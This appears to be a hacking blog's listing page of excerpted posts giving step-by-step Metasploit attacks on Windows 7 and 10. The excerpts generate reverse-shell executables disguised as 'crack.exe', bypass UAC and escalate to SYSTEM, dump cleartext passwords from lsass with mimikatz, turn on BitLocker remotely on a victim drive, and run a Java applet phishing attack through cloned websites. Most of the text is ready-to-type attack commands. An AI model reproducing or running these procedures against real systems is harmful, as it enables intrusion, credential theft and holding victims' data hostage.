Skip to main content

Posts

Showing posts with the label meterpreter

Windows 10 UAC Bypass

Advanced Windows Exploitation In the previous post we saw how to get a meterpreter session, now we will use the same session to exploit further and gain SYSTEM level privileges. Taking into consideration that we have meterpreter session we will move on to next step. STEP 1: We will background the session that we had. To do this type the following command: background (to get out of meterpreter) Then type: back (to get out of currently used exploit) Then type: search UAC (to get all the UAC bypass exploits) STEP 2: Select the most appropriate exploit that is running in the latest windows 10 update too. Here we will select Windows Escalate UAC Protection Bypass (via SilentCleanup). To use this type the following command: use exploit/windows/local/bypassuac_silentcleanup set lhost <your IP> set lport 8080 set session <session ID> *To see stored session IDs type sessions -l set payload windows/x64/meterpreter/reverse_tcp run STEP 3: We have successfully bypassed the UAC and have...

Exploiting Windows 10

Exploiting Windows 10 (latest update) using metasploit (in KALI): Cyberator Introduction: The Metasploit Framework is the most commonly-used framework for hackers worldwide. It allows hackers to set up listeners that create a conducive environment (referred to as a Meterpreter) to manipulate compromised machines. In this article, we’ll look at how this framework within Kali Linux can be used to attack a Windows 10 machine.  This article assumes the installation of Kali Linux has been done and is reachable through a bridged connection from a Windows machine on Virtual-box. Step 1: - Open terminal in Kali and type the following command: msfvenom -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=<your IP> -f exe > /root/Desktop/crack.exe Step 2: - Open terminal in Kali and type the following commands     msfdb init    msfconsole    use exploit/multi/handler    set payload windows/x64/meterpreter/reverse_tcp    ...

Dumping Remote Windows Admin Password in clear text

Step1: Hack Win-7 and get the meterpreter shell. (As I demonstrated in the previous Post) Step 2: Now gain system level privileges (using sysret.exe method, as demonstrated in the previous Post)  Step 3 Type the following commands inside the meterpreter shell: upload <path of mimikatz.exe> c:\\ upload <path of sekurlsa.dll> c:\\ Step 4: Get into windows command prompt by typing " shell " command Then get the mimikatz shell by typing " mimikatz " into the command prompt *note: first navigate to the directory where mimikatz is uploaded. Step 5: Now type the following commands: privilege::debug inject::process lsass.exe sekurlsa.dll sekurlsa::logonPasswords full     After typing the third command you can view the clear text password on your screen :)

PostExploitation : Turning On BitLocker on the remote system :)

Step 1: Hack Win-7 and get the meterpreter shell. (As I demonstrated in the previous Post) Now gain system level privileges (using sysret.exe method, as demonstrated in the previous Post) Step 2: Type " shell " to get the command prompt of the remote system. Type " manage.bde -status " to get the current status of BitLocker. Step 3:  Type the following command to turn on the bit locker on any drive: manage-bde -on <drive letter to encrypt>: -RecoveryKey c:/windows/system -RecoveryPassword   Encryption process is in progress now.......... :)

Post Exploitation: Gaining System Level Privilege of compromised Win-7 System

Step 1: CYBERATOR Hack Win-7 and get the meterpreter shell. (As I demonstrated in the previous Post) My current Privileges are: Step 2: Download the following Resources: Sysret.exe MinHook.x64.dll Now Upload these files to the Victim's Computer using the following Command: upload <path where Sysret.exe is kept> . upload <path of  MinHook.x64.dll> . Step 3: Inside meterpreter shell type " ls " to list all the ongoing process. Note down the PID of explorer.exe .                   ( 1404 my this case) Step 4: Type " shell " to get into the command prompt of the victim's computer. Then type the following command inside the command shell: sysret.exe -pid 1404        <type the pid of explorer.exe as shown in your system...in my case its 1404> Press " ctrl+c " to terminate c...

Social Engineering Toolkit

Java Applet Attack(using SET) CYBERATOR Step 1:             Start the SET(Social Engg. Toolkit) and select option 1 Step 2:             Now select option number 2 Step 3:              Now select "java applet attack method" Step 4:            Select website template. If you want to copy any website, you can use the second option also. Step 5:            Now provide your local IP address. If you are conducting the attack on WAN you must do port forwarding first and provide your public IP instead. Step 6:            I have selected Website template option so I'm having a list of built in templates. Choose any of the f...

Exploiting Windows 7

Hacking Windows 7 using Metasploit CYBERATOR Step 1:       Boot Windows 7 in virtual Box: Step 2:         Start a new Terminal and type the following command: msfpayload windows/meterpreter/reverse_tcp lhost=<attacker's IP> lport=4444 x>exploit.exe Step 3:      Start a new terminal and type " msfconsole ". Now type following commands: use exploit/multi/handler set lhost <Attacker's IP> set lport 4444 set payload windows/meterpreter/reverse_tcp exploit Step 4:      Open up windows 7 machine and run the exploit.exe which we created.      You can make your exploit accessible over the network using Apache     server Step 5: Run the exploit...we will get a meterpreter session opened. Type following commands: sysinfo getprivs....etc